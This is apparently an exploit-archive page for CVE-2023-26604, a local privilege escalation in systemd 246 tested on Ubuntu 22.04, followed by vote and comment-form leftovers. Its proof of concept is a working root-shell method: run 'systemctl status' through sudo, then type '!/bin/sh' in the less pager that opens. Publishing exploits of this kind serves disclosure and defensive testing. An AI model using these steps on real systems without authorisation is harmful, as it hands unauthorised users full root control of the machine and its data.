systemd 246 Local Root Privilege Escalation

2023.08.11

Credit: Iyaad Luqman K

Risk: High

Local: Yes

Remote: No

CVE: CVE-2023-26604

CWE: CWE-264

# Exploit Title: systemd 246 - Local Privilege Escalation
# Exploit Author: Iyaad Luqman K (init_6)
# Application: systemd 246
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-26604
systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user.
This vulnerability allows a local attacker to gain root privileges.
## Proof Of Concept:
1. Run the systemctl command which can be run as root user.
sudo /usr/bin/systemctl status any_service
2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.
3. Type in `!/bin/sh` in the pager to spawn a shell as root user.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

systemd 246 Local Root Privilege Escalation

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.